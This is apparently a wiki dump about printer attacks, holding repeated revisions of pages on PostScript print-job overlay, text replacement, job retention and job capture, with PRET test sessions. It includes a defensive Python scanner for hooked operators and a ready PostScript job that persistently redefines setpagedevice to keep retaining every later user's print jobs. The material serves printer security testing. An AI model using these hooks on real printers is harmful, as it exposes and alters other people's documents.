by other users * Print job manip..." wikitext text/x-wiki ''Currently, the following denial of service techniques are discussed in this wiki:'' * Print job retention]] – Obtaining documents printed by other users * Print job manipulation]] – Editing documents printed by other users be8a9991fd610ab9f8a5c375cbe439de953c1f0f Print job manipulation 0 47 323 215 2017-01-31T10:29:00Z 84.153.135.135 0 /* Content Replacement */ wikitext text/x-wiki If an attacker can alter print jobs, she fundamentally undermines trust. A user cannot be sure anymore if the document viewed on screen is the same as the hard copy emerging from the printer. The impact depends on the context of the print job and can range from simple pranks to serious business impairment. Two PostScript based techniques are discussed below. == Content Overlay == [[File:Overlay.jpg|thumb|Smiley overlay attack on others' jobs]] One simple way to manipulate the appearance of printouts is to use overlays. PCL has a documented function to put overlay macros on top of a document. Unfortunately, this feature is limited to the current print job and cannot be made permanent. PostScript does not offer such functionality by default, however it can be programmed into by [[PostScript#Operator redefinition|redefining]] the ''showpage'' operator which is contained in every PostScript document to print the current page. The attacker can hook in there, execute her own code and then call the original version of the operator. Therefore she can overlay all pages to be printed with a custom ''EPS'' file. This hack can be used to add arbitrary graphics or fonts to hard copies of a document. It is handy to play pranks like putting ‘hax0r slogans’ on all sheets – but also for legitimate tasks such as creating letterheads. Pranks range from occasional coffee stains on the sheets of a particular user to the simulation of a near empty toner cartridge. 
It is also possible to completely alter the appearance of a document by overlaying a blank page and then adding custom content. For a more advanced attack, imagine the victim wants to sell a good to the attacker. Both parties agree on a price and receive a digital copy of the sales agreement. As the attacker knows the exact location of the price in the document, by manipulating the victim's printer she can add a blank rectangle there, containing a lower price. If the printout is not re-checked before the contract is signed, the victim might need a good lawyer. This attack works even if the contract document was digitally signed and verified by a print server, because the file itself remains untouched. Obviously, such an approach can only be successful if PostScript is used as printer driver and no ''StartJobPassword'' (see [[credential disclosure]]) is set.

'''How to test for this attack?''' Use [[PRET]]'s ''cross'' or ''overlay'' commands in ''ps'' mode, then disconnect and print an arbitrary document:
<pre>
./pret.py -q printer ps
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> overlay overlays/smiley.eps
printer:/> cross whoa "HACKED"
printer:/> exit
</pre>
'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== Content Replacement ==
Even if an attacker can put an overlay above existing documents, she will not be able to alter specific values in the original document unless its exact structure is known. Sometimes one does not only want to add custom content, but to parse and replace parts of the existing document. Especially replacing text seems to be an attractive function, introducing new possibilities to the attacker as she can go for targeted manipulation or randomly transpose digits and introduce misspellings.
The problem of replacing text in PostScript files can be reduced to the problem of extracting strings from the rendered document. This is not trivial, because strings can be dynamically built by the PostScript program itself. Hence, simple parsing and replacing within the document source code is not an option. This issue has been discussed by <ref name="nevill1997extracting">''[https://pdfs.semanticscholar.org/494d/24a72be788a91a6ca45373c2d33013f33395.pdf Extracting Text from PostScript]'', C. Nevill-Manning, T. Reed and others, 1997</ref>. They use a PostScript interpreter with a redefined ''show'' operator to index documents for the New Zealand Digital Library Project (NZDLP). The ''show'' operator accepts a string as input, which is painted to a certain location of the current page. By redefining the operator, text can elegantly be extracted. This approach can also be used for targeted searching and replacing in strings immediately before they are painted. While this scheme sounds good in theory and was ‘surprisingly effective on the 40,000 technical reports’ <ref name="nevill1997extracting"/> of the NZDLP, it depends on the quality of the PostScript code, whether generated directly by an application or by a printing system like CUPS. For example, the approach is successful for ''LaTeX'' based PostScript documents which are sent directly to the printer, while it fails for PostScript files generated by ''GIMP'' <ref>''[https://www.gimp.org/ GIMP – GNU Image Manipulation Program]'', S. Kimball and P. Mattis</ref>, which emits raster graphics of the text instead of strings. The same issue occurs for any document format – even PostScript itself – when processed by CUPS. Theoretically such language constructs could also be parsed and should be the subject of further research.
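Both hooks discussed on this page, the ''showpage'' wrapper behind content overlay and the ''show'' wrapper behind content replacement, only outlive the current job when the interpreter lets the job leave its server loop, which is what an unset ''StartJobPassword'' permits. The scanner below is an added example, not code from this wiki or from PRET: it runs over a job on the print server (an assumed deployment point) and flags those operator redefinitions together with the ''exitserver''/''startjob'' constructs that make them permanent; the function names and the three sample jobs are constructed for this example.

```python
"""Scan a PostScript print job for the operator hooks described above.
Added example, not code from the Hacking Printers wiki or from PRET."""
from __future__ import annotations
import re
from dataclasses import dataclass

HOOKS = {"showpage": "page_hook", "copypage": "page_hook",          # overlay hook targets
         **{n: "text_hook" for n in ("show", "ashow", "widthshow",   # text-replacement hook targets
                                      "awidthshow", "kshow", "xshow", "yshow", "xyshow")}}
PERSIST_RE = re.compile(r"\b(exitserver|startjob)\b")     # leaves the job's server loop
NAME_PROC_RE = re.compile(r"/([A-Za-z_][\w.]*)\s*\{")     # `/name {`
TAIL_RE = re.compile(r"\s*(?:bind\s+)?(?:def|put)\b")     # `} def`, `} bind def`, `} put`

@dataclass(frozen=True)
class Finding:
    line: int    # 1-based line in the original job
    kind: str    # "page_hook", "text_hook" or "persistence"
    token: str

def neutralize(ps: str) -> str:
    """Blank % comments and (string) bodies, keeping length and newlines so
    offsets into the result still map to lines of the original job."""
    out, depth, i = [], 0, 0
    while i < len(ps):
        c = ps[i]
        if depth == 0 and c == "%":            # comment runs to end of line
            j = ps.find("\n", i)
            j = len(ps) if j < 0 else j
            out.append(" " * (j - i))
            i = j
            continue
        if c == "(":
            depth += 1
        elif c == ")" and depth:
            depth -= 1
        elif c == "\\" and depth:              # escaped char inside a string
            out.append(" ")
            i += 1
            c = ps[i] if i < len(ps) else ""
        out.append(c if depth == 0 or c == "\n" else " ")
        i += 1
    return "".join(out)

def match_brace(code: str, start: int) -> int:
    """Index just past the `}` closing the `{` at `start`, or -1."""
    depth = 0
    for i in range(start, len(code)):
        depth += {"{": 1, "}": -1}.get(code[i], 0)
        if depth == 0:
            return i + 1
    return -1

def scan(ps: str) -> list[Finding]:
    """Every hook (re)definition and server-loop exit in the job, by line."""
    code = neutralize(ps)
    found = []
    for m in NAME_PROC_RE.finditer(code):
        end = match_brace(code, m.end() - 1)
        if end < 0 or not TAIL_RE.match(code, end):   # `{...}` not followed by def/put
            continue
        kind = HOOKS.get(m.group(1))
        if kind:
            found.append(Finding(ps.count("\n", 0, m.start()) + 1, kind, m.group(1)))
    for m in PERSIST_RE.finditer(code):
        found.append(Finding(ps.count("\n", 0, m.start()) + 1, "persistence", m.group(1)))
    return sorted(found, key=lambda f: f.line)

def verdict(findings: list[Finding]) -> str:
    """Triage label: a print server should hold "persistent_hook" jobs for review."""
    kinds = {f.kind for f in findings}
    hooked = kinds & {"page_hook", "text_hook"}
    if hooked and "persistence" in kinds:
        return "persistent_hook"       # would act on every later job the device prints
    if hooked:
        return "transient_hook"        # dies with the job; some driver prologs do this
    if "persistence" in kinds:
        return "server_state_change"
    return "clean"

# Constructed sample jobs (not captured from a real device). The last one leaves
# the server loop with the default password, which a device without a
# StartJobPassword accepts; the hook bodies only call the original operator.
CLEAN_JOB = """%!PS-Adobe-3.0
%%Title: report.tex (dvips-style prolog, constructed)
/F1 /Times-Roman findfont 12 scalefont def
F1 setfont 72 720 moveto (Quarterly report: 100% done) show
showpage
"""
TRANSIENT_JOB = """%!PS
/showpage { systemdict /showpage get exec } bind def
"""
PERSISTENT_JOB = """%!PS
serverdict begin 0 exitserver
/show { systemdict /show get exec } bind def
"""

if __name__ == "__main__":
    for name, job in (("clean", CLEAN_JOB), ("transient", TRANSIENT_JOB), ("persistent", PERSISTENT_JOB)):
        print(name, verdict(scan(job)), scan(job))
```

The transient verdict is a review signal rather than a block decision, since some legitimate driver prologs wrap ''showpage'' within their own job.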
'''How to test for this attack?''' Use [[PRET]]'s ''replace'' command in ''ps'' mode, then disconnect and print a PostScript document containing ‘DEF’: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> replace "ABC" "DEF" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 7c5739c5605bf09eaa29987cb37307fecb062f9a 215 214 2017-01-23T17:51:27Z Admin 1 wikitext text/x-wiki If an attacker can alter print jobs, she fundamentally undermines trust. A user cannot be sure anymore if the document viewed on screen is the same as the hard copy emerging from the printer. The impact depends on the context of the print job and can range from simple pranks to serious business impairment. Two PostScript based techniques are discussed below. == Content Overlay == [[File:Overlay.jpg|thumb|Smiley overlay attack on others' jobs]] One simple way to manipulate the appearance of printouts is to use overlays. PCL has a documented function to put overlay macros on top of a document. Unfortunately, this feature is limited to the current print job and cannot be made permanent. PostScript does not offer such functionality by default, however it can be programmed into by [[PostScript#Operator redefinition|redefining]] the ''showpage'' operator which is contained in every PostScript document to print the current page. The attacker can hook in there, execute her own code and then call the original version of the operator. Therefore she can overlay all pages to be printed with a custom ''EPS'' file. This hack can be used to add arbitrary graphics or fonts to hard copies of a document. It is handy to play pranks like putting ‘hax0r slogans’ on all sheets – but also for legitimate tasks such as creating letterheads. 
Pranks range from occasional coffee stains on the sheets of a particular user to the simulation of a near empty toner cartridge. It is also possible to completely alter the appearance of a document by overlaying a blank page and then adding custom content. For a more advanced attack, imagine the victim wants to sell a good to the attacker. Both parties agree on a price and receive a digital copy of the sales agreement. As the attacker knows the exact location of the price in the document, by manipulating the victim's printer she can add a blank rectangle here, including a lower price. If the printout is not re-checked before the contract is signed, the victim might need a good lawyer. This attack works even if the contract document was digitally signed and verified by a print server, because the file itself remains untouched. Obviously, such an approach can only be successful if PostScript is used as printer driver and no ''StartJobPassword'' (see [[credential disclosure]]) is set. '''How to test for this attack?''' Use [[PRET]]'s ''cross'' or ''overlay'' commands in ''ps'' mode, then disconnect and print an arbitrary document: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> overlay overlays/smiley.eps printer:/> cross whoa "HACKED" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == Content Replacement == Even if an attacker can put an overlay above existing documents, she will not be able to alter specific values in the original document unless its exact structure is known. Sometimes ones does not only want to add custom content, but to parse and replace parts of the existing document. 
Especially replacing text seems to be an attractive function, introducing new possibilities to the attacker as she can go for targeted manipulation or randomly transpose digits and introduce misspellings. The problem of replacing text in PostScript files can be reduced to the problem of extracting strings from the rendered document. This is not trivial, because strings can be dynamically built by the PostScript program itself. Hence, simple parsing and replacing within the document source code is not an option. This issue has been discussed by <ref name="nevill1997extracting">''[https://pdfs.semanticscholar.org/494d/24a72be788a91a6ca45373c2d33013f33395.pdf Extracting Text from PostScript]'', C. Nevill-Manning, T. Reed and others, 1997</ref>. They use a PostScript interpreter with a redefined ''show'' operator to index documents for the New Zealand Digital Library Project (NZDLP). The ''show'' operator accepts a string as input, which is painted to a certain location of the current page. By redefining the operator, text can elegantly be extracted. This approach can also be used for targeted searching and replacing in strings immediately before they are painted. While this scheme sounds good in theory and was ‘surprisingly effective on the 40,000 technical reports’ <ref name="nevill1997extracting"/> of the NZDLP, it depends on the PostScript code quality generated either directly by an application or by a printing system like CUPS. For example, the approach is successful for ''LaTeX'' based PostScript documents which are directly send to the printer while it fails for PostScript files generated by ''GIMP'' <ref>''[https://www.gimp.org/ GIMP – GNU Image Manipulation Program]'', S. Kimball and P. Mattis</ref> which instead of strings creates raster graphics of their representation. The same issue occurs for any document format – even PostScript itself – when processed by CUPS. 
Theoretically such language constructs could also be parsed and should be subject of further research. '''How to test for this attack?''' Use [[PRET]]'s ''replace'' command in ''ps'' mode, then disconnect and print a PostScript document containing ‘DEF’: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> replace "ABC" "DEF" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 30e94d42d6346d2e2bebcd58d495c326b6e61ecf 214 213 2017-01-23T17:21:29Z Admin 1 wikitext text/x-wiki If an attacker can alter print jobs, she fundamentally undermines trust. A user cannot be sure anymore if the document viewed on screen is the same as the hard copy emerging from the printer. The impact depends on the context of the print job and can range from simple pranks to serious business impairment. Two PostScript based techniques are discussed below. == Content Overlay == [[File:Overlay.jpg|thumb|Smiley overlay attack on others' jobs]] One simple way to manipulate the appearance of printouts is to use overlays. PCL has a documented function to put overlay macros on top of a document. Unfortunately, this feature is limited to the current print job and cannot be made permanent. PostScript does not offer such functionality by default, however it can be programmed into by [[PostScript#Operator redefinition|redefining]] the ''showpage'' operator which is contained in every PostScript document to print the current page. The attacker can hook in there, execute her own code and then call the original version of the operator. Therefore she can overlay all pages to be printed with a custom ''EPS'' file. This hack can be used to add arbitrary graphics or fonts to hard copies of a document. 
It is handy to play pranks like putting `hax0r slogans` on all sheets – but also for legitimate tasks such as creating letterheads. Pranks range from occasional coffee stains on the sheets of a particular user to the simulation of a near empty toner cartridge. It is also possible to completely alter the appearance of a document by overlaying a blank page and then adding custom content. For a more advanced attack, imagine the victim wants to sell a good to the attacker. Both parties agree on a price and receive a digital copy of the sales agreement. As the attacker knows the exact location of the price in the document, by manipulating the victim's printer she can add a blank rectangle here, including a lower price. If the printout is not re-checked before the contract is signed, the victim might need a good lawyer. This attack works even if the contract document was digitally signed and verified by a print server, because the file itself remains untouched. Obviously, such an approach can only be successful if PostScript is used as printer driver and no ''StartJobPassword'' (see [[credential disclosure]]) is set. '''How to test for this attack?''' Use [[PRET]]'s ''cross'' or ''overlay'' commands in ''ps'' mode, then disconnect and print an arbitrary document: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> overlay overlays/smiley.eps printer:/> cross whoa "HACKED" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == Content Replacement == Even if an attacker can put an overlay above existing documents, she will not be able to alter specific values in the original document unless its exact structure is known. Sometimes ones does not only want to add custom content, but to parse and replace parts of the existing document. 
Especially replacing text seems to be an attractive function, introducing new possibilities to the attacker as she can go for targeted manipulation or randomly transpose digits and introduce misspellings. The problem of replacing text in PostScript files can be reduced to the problem of extracting strings from the rendered document. This is not trivial, because strings can be dynamically built by the PostScript program itself. Hence, simple parsing and replacing within the document source code is not an option. This issue has been discussed by <ref name="nevill1997extracting">''[https://pdfs.semanticscholar.org/494d/24a72be788a91a6ca45373c2d33013f33395.pdf Extracting Text from PostScript]'', C. Nevill-Manning, T. Reed and others, 1997</ref>. They use a PostScript interpreter with a redefined ''show'' operator to index documents for the New Zealand Digital Library Project (NZDLP). The ''show'' operator accepts a string as input, which is painted to a certain location of the current page. By redefining the operator, text can elegantly be extracted. This approach can also be used for targeted searching and replacing in strings immediately before they are painted. While this scheme sounds good in theory and was 'surprisingly effective on the 40,000 technical reports` <ref name="nevill1997extracting"/> of the NZDLP, it depends on the PostScript code quality generated either directly by an application or by a printing system like CUPS. For example, the approach is successful for ''LaTeX'' based PostScript documents which are directly send to the printer while it fails for PostScript files generated by ''GIMP'' <ref>''[https://www.gimp.org/ GIMP – GNU Image Manipulation Program]'', S. Kimball and P. Mattis</ref> which instead of strings creates raster graphics of their representation. The same issue occurs for any document format – even PostScript itself – when processed by CUPS. 
Theoretically such language constructs could also be parsed and should be subject of further research. '''How to test for this attack?''' Use [[PRET]]'s ''replace'' command in ''ps'' mode, then disconnect and print a PostScript document containing ‘DEF’: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> replace "ABC" "DEF" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 3b45118b545ede42be0d88c94f17687e7e30bc75 213 211 2017-01-23T17:17:34Z Admin 1 wikitext text/x-wiki If an attacker can alter print jobs, she fundamentally undermines trust. A user cannot be sure anymore if the document viewed on screen is the same as the hard copy emerging from the printer. The impact depends on the context of the print job and can range from simple pranks to serious business impairment. Two PostScript based techniques are discussed below. == Content Overlay == [[File:Overlay.jpg|thumb|Smiley overlay attack on others' jobs]] One simple way to manipulate the appearance of printouts is to use overlays. PCL has a documented function to put overlay macros on top of a document. Unfortunately, this feature is limited to the current print job and cannot be made permanent. PostScript does not offer such functionality by default, however it can be programmed into by [[PostScript#Operator redefinition|redefining]] the ''showpage'' operator which is contained in every PostScript document to print the current page. The attacker can hook in there, execute her own code and then call the original version of the operator. Therefore she can overlay all pages to be printed with a custom ''EPS'' file. This hack can be used to add arbitrary graphics or fonts to hard copies of a document. 
It is handy to play pranks like putting `hax0r slogans` on all sheets – but also for legitimate tasks such as creating letterheads. Pranks range from occasional coffee stains on the sheets of a particular user to the simulation of a near empty toner cartridge. It is also possible to completely alter the appearance of a document by overlaying a blank page and then adding custom content. For a more advanced attack, imagine the victim wants to sell a good to the attacker. Both parties agree on a price and receive a digital copy of the sales agreement. As the attacker knows the exact location of the price in the document, by manipulating the victim's printer she can add a blank rectangle here, including a lower price. If the printout is not re-checked before the contract is signed, the victim might need a good lawyer. This attack works even if the contract document was digitally signed and verified by a print server, because the file itself remains untouched. Obviously, such an approach can only be successful if PostScript is used as printer driver and no ''StartJobPassword'' (see [[credential disclosure]]) is set. '''How to test for this attack?''' Use [[PRET]]'s ''cross'' or ''overlay'' commands in ''ps'' mode, then disconnect and print an arbitrary document: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> overlay overlays/smiley.eps printer:/> cross whoa "HACKED" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == Content Replacement == Even if an attacker can put an overlay above existing documents, she will not be able to alter specific values in the original document unless its exact structure is known. Sometimes ones does not only want to add custom content, but to parse and replace parts of the existing document. 
Especially replacing text seems to be an attractive function, introducing new possibilities to the attacker as she can go for targeted manipulation or randomly transpose digits and introduce misspellings. The problem of replacing text in PostScript files can be reduced to the problem of extracting strings from the rendered document. This is not trivial, because strings can be dynamically built by the PostScript program itself. Hence, simple parsing and replacing within the document source code is not an option. This issue has been discussed by <ref name="nevill1997extracting">''[https://pdfs.semanticscholar.org/494d/24a72be788a91a6ca45373c2d33013f33395.pdf Extracting Text from PostScript]'', C. Nevill-Manning, T. Reed and others, 1997</ref>. They use a PostScript interpreter with a redefined ''show'' operator to index documents for the New Zealand Digital Library Project (NZDLP). The ''show'' operator accepts a string as input, which is painted to a certain location of the current page. By redefining the operator, text can elegantly be extracted. This approach can also be used for targeted searching and replacing in strings immediately before they are painted. While this scheme sounds good in theory and was 'surprisingly effective on the 40,000 technical reports` <ref name="nevill1997extracting"/> of the NZDLP, it depends on the PostScript code quality generated either directly by an application or by a printing system like CUPS. For example, the approach is successful for ''LaTeX'' based PostScript documents which are directly send to the printer while it fails for PostScript files generated by ''GIMP'' <ref>''[https://www.gimp.org/ GIMP – GNU Image Manipulation Program]'', S. Kimball and P. Mattis</ref> which instead of strings creates raster graphics of their representation. The same issue occurs for any document format – even PostScript itself – when processed by CUPS. 
Theoretically such language constructs could also be parsed, this would however go beyond the scope of this work. '''How to test for this attack?''' Use [[PRET]]'s ''replace'' command in ''ps'' mode, then disconnect and print a PostScript document containing ‘DEF’: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> replace "ABC" "DEF" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- ee0ea5e94a23a94d2882a91f393c90c77a75f661 211 210 2017-01-23T17:06:32Z Admin 1 wikitext text/x-wiki If an attacker can alter print jobs, she fundamentally undermines trust. A user cannot be sure anymore if the document viewed on screen is the same as the hard copy emerging from the printer. The impact depends on the context of the print job and can range from simple pranks to serious business impairment. Two PostScript based techniques are discussed below. == Content Overlay == One simple way to manipulate the appearance of printouts is to use overlays. PCL has a documented function to put overlay macros on top of a document. Unfortunately, this feature is limited to the current print job and cannot be made permanent. PostScript does not offer such functionality by default, however it can be programmed into by [[PostScript#Operator redefinition|redefining]] the ''showpage'' operator which is contained in every PostScript document to print the current page. The attacker can hook in there, execute her own code and then call the original version of the operator. Therefore she can overlay all pages to be printed with a custom ''EPS'' file. This hack can be used to add arbitrary graphics or fonts to hard copies of a document. It is handy to play pranks like putting `hax0r slogans` on all sheets – but also for legitimate tasks such as creating letterheads. 
Pranks range from occasional coffee stains on the sheets of a particular user to the simulation of a near empty toner cartridge. It is also possible to completely alter the appearance of a document by overlaying a blank page and then adding custom content. For a more advanced attack, imagine the victim wants to sell a good to the attacker. Both parties agree on a price and receive a digital copy of the sales agreement. As the attacker knows the exact location of the price in the document, by manipulating the victim's printer she can add a blank rectangle here, including a lower price. If the printout is not re-checked before the contract is signed, the victim might need a good lawyer. This attack works even if the contract document was digitally signed and verified by a print server, because the file itself remains untouched. Obviously, such an approach can only be successful if PostScript is used as printer driver and no ''StartJobPassword'' (see [[credential disclosure]]) is set. '''How to test for this attack?''' Use [[PRET]]'s ''cross'' or ''overlay'' commands in ''ps'' mode, then disconnect and print an arbitrary document: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> overlay overlays/smiley.eps printer:/> cross whoa "HACKED" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == Content Replacement == Even if an attacker can put an overlay above existing documents, she will not be able to alter specific values in the original document unless its exact structure is known. Sometimes ones does not only want to add custom content, but to parse and replace parts of the existing document. 
Especially replacing text seems to be an attractive function, introducing new possibilities to the attacker as she can go for targeted manipulation or randomly transpose digits and introduce misspellings. The problem of replacing text in PostScript files can be reduced to the problem of extracting strings from the rendered document. This is not trivial, because strings can be dynamically built by the PostScript program itself. Hence, simple parsing and replacing within the document source code is not an option. This issue has been discussed by <ref name="nevill1997extracting">''[https://pdfs.semanticscholar.org/494d/24a72be788a91a6ca45373c2d33013f33395.pdf Extracting Text from PostScript]'', C. Nevill-Manning, T. Reed and others, 1997</ref>. They use a PostScript interpreter with a redefined ''show'' operator to index documents for the New Zealand Digital Library Project (NZDLP). The ''show'' operator accepts a string as input, which is painted to a certain location of the current page. By redefining the operator, text can elegantly be extracted. This approach can also be used for targeted searching and replacing in strings immediately before they are painted. While this scheme sounds good in theory and was 'surprisingly effective on the 40,000 technical reports` <ref name="nevill1997extracting"/> of the NZDLP, it depends on the PostScript code quality generated either directly by an application or by a printing system like CUPS. For example, the approach is successful for ''LaTeX'' based PostScript documents which are directly send to the printer while it fails for PostScript files generated by ''GIMP'' <ref>''[https://www.gimp.org/ GIMP – GNU Image Manipulation Program]'', S. Kimball and P. Mattis</ref> which instead of strings creates raster graphics of their representation. The same issue occurs for any document format – even PostScript itself – when processed by CUPS. 
Theoretically such language constructs could also be parsed, this would however go beyond the scope of this work. '''How to test for this attack?''' Use [[PRET]]'s ''replace'' command in ''ps'' mode, then disconnect and print a PostScript document containing ‘DEF’: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> replace "ABC" "DEF" printer:/> exit '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- ddddeadc9da7c8efff8929635d9a65798be63510 210 2017-01-23T17:05:25Z Admin 1 Created page with "If an attacker can alter print jobs, she fundamentally undermines trust. A user cannot be sure anymore if the document viewed on screen is the same as the hard copy emerging f..." wikitext text/x-wiki If an attacker can alter print jobs, she fundamentally undermines trust. A user cannot be sure anymore if the document viewed on screen is the same as the hard copy emerging from the printer. The impact depends on the context of the print job and can range from simple pranks to serious business impairment. Two PostScript based techniques are discussed below. == Content Overlay == One simple way to manipulate the appearance of printouts is to use overlays. PCL has a documented function to put overlay macros on top of a document. Unfortunately, this feature is limited to the current print job and cannot be made permanent. PostScript does not offer such functionality by default, however it can be programmed into by [[PostScript#Operator redefinition|redefining]] the ''showpage'' operator which is contained in every PostScript document to print the current page. The attacker can hook in there, execute her own code and then call the original version of the operator. Therefore she can overlay all pages to be printed with a custom ''EPS'' file. 
= Print job retention =
''Last revised 2017-01-29.''

The most valuable data found on printers is the print jobs themselves. Even in a digital world, important documents are printed and kept as hard copies. In high-security environments with encrypted hard disks and encrypted network traffic, printers might be the weakest link in the security chain. However, even with access to the file system of a printer, an attacker cannot retrieve print jobs unless they have explicitly been stored: print jobs are normally processed on the fly in memory and never touch the hard disk. This article discusses legitimate print job retention features and methods to actively capture documents that are about to be printed.

== Job Retention ==
Some printers expose stored print jobs through their embedded web server (for example, the ''HP DesignJet Z6100ps''). Usually, however, job retention must be explicitly activated for a particular print job, which can be done using standard PJL commands or proprietary PostScript code. Such jobs are then kept in memory and can be reprinted from the control panel.
=== PJL ===
Legitimate job retention can be enabled for the current document by setting the PJL ''HOLD'' variable<ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 10-2</ref> as shown below:

 @PJL SET HOLD=ON
 [actual data to be printed follows]

Held jobs are kept in memory and can be reprinted from the printer's control panel. This feature is supported by various printers; however, only some Epson devices seem to allow permanent job retention for all future jobs to be set using <code>@PJL DEFAULT HOLD=ON</code>.

'''How to test for this attack?''' Use [[PRET]]'s ''hold'' command in ''pjl'' mode to check whether permanent job retention can be set. The output below shows a device that does not keep the setting:

 ./pret.py -q printer pjl
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> hold
 Setting job retention, reconnecting to see if still enabled
 Retention for future print jobs: OFF

'''Who can perform this attack?''' Enabling retention requires only the ability to print, but the stored jobs can only be reprinted by a physical/local attacker at the control panel.

=== PostScript ===
PostScript offers similar functionality, which however is model- and vendor-specific. For the HP LaserJet 4k series and various Kyocera printers, job retention can be enabled by prepending the following commands to a PostScript document:

<syntaxhighlight lang=postscript>
<< /Collate true /CollateDetails << /Hold 1 /Type 8 >> >> setpagedevice
</syntaxhighlight>

While it is theoretically possible to permanently enable PostScript job retention using the [[PostScript#Security_features|startjob]] operator, this setting is explicitly reset by ''CUPS'' at the beginning of each print job using <code><< /Collate false >> setpagedevice</code>. To counter this protection mechanism, the attacker can permanently redefine the <code>setpagedevice</code> operator to have no effect at all.
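As an added example that is not part of the original page or of PRET, the following job implements the persistence trick just described and goes one step further than a blanket no-op: instead of discarding every <code>setpagedevice</code> call, the hook strips only the keys a later job would use to switch retention off and forwards the rest, so paper size, duplex and similar per-job settings keep working. It assumes that no ''StartJobPassword'' is set and that the device honours the HP/Kyocera-style ''CollateDetails'' dictionary quoted above; the name ''setpagedevice-orig'' is chosen here.

```postscript
%!PS-Adobe-3.0
% Added example for the wiki page: keep PostScript job retention switched on
% across jobs. Not the wiki's or PRET's own code. Assumptions: StartJobPassword
% is unset (0); the device accepts the /CollateDetails hold dictionary.

true 0 startjob pop                     % leave the server loop so the changes below persist

% 1) turn retention on with the genuine operator, inside this unencapsulated job
<< /Collate true /CollateDetails << /Hold 1 /Type 8 >> >> setpagedevice

% 2) keep a handle to the genuine operator (guard against running this twice)
userdict /setpagedevice-orig known not
  { userdict /setpagedevice-orig /setpagedevice load put } if

% 3) shadow setpagedevice for every later job: drop the two keys a job would
%    use to switch retention off (CUPS sends << /Collate false >>) and forward
%    everything else unchanged
userdict /setpagedevice {
  dup length dict copy                  % work on a copy of the caller's dictionary
  dup /Collate undef
  dup /CollateDetails undef
  setpagedevice-orig
} bind put

% to undo from another unencapsulated job:
%   userdict /setpagedevice userdict /setpagedevice-orig get put
```

After this job, the <code><< /Collate false >> setpagedevice</code> that CUPS prepends arrives at the hook as an empty dictionary and changes nothing. The page's simpler variant, redefining <code>setpagedevice</code> as <code>{ pop }</code>, also works but silently discards every subsequent job's media settings, which users will notice.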
'''How to test for this attack?''' Use [[PRET]]'s ''hold'' command in ''ps'' mode:

 ./pret.py -q printer ps
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> hold
 Job retention enabled.

'''Who can perform this attack?''' Enabling retention requires only the ability to print, but the stored jobs can only be reprinted by a physical/local attacker at the control panel.

== Job Capture ==
It is possible but uncommon to activate job retention in the printing dialog as discussed above. With PostScript, however, one has complete control over the current print job, and with the [[PostScript#Security_features|startjob]] operator it is even possible to break out of the server loop and access future jobs. Such functionality has the potential to capture all documents if PostScript is used as the printer driver.

=== PostScript ===
With the capability to hook into arbitrary PostScript operators, it is possible to manipulate and access foreign print jobs. To parse the actual data stream sent to the printer, one can use a convenient feature of the PostScript language: a program can read its own source as data using the ''currentfile'' operator. This way, the whole data stream to be processed by the PostScript interpreter can be read and written to a file on the printer. If the printer does not offer [[file system access]], captured documents can be stored in memory instead, for example within permanent PostScript dictionaries. One practical problem is deciding which operator to hook, since the attacker does not gain access to the data stream until that operator is executed by the interpreter. As the attacker wants to capture print jobs from the very beginning, the redefined operator must be the first operator in the PostScript document. Fortunately, all documents printed through CUPS are wrapped in a fixed structure that begins with <code>currentfile /ASCII85Decode filter /LZWDecode filter cvx exec</code>.

Based on the assumption of such a fixed structure, the attacker can capture a document from its beginning and execute (that is, print) it afterwards. For printing systems other than CUPS, this attack should also be possible, but the hooked operators need to be adapted. Note that the PostScript header, which usually includes media size, user and job names, cannot be captured using this method because the hook only takes effect at the beginning of the actual document. Another generic strategy is to install a ''BeginPage'' procedure through the page device (<code>setpagedevice</code>), which the interpreter calls at the start of every page, if the printer supports it (most do). This vulnerability has presumably been present in printing devices for decades, as only language constructs defined by the PostScript standard are abused.

'''How to test for this attack?''' Use [[PRET]]'s ''capture'' command in ''ps'' mode:

 ./pret.py -q printer ps
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> capture
 Print job operations:  capture <operation>
   capture start  - Record future print jobs.
   capture stop   - End capturing print jobs.
   capture list   - Show captured print jobs.
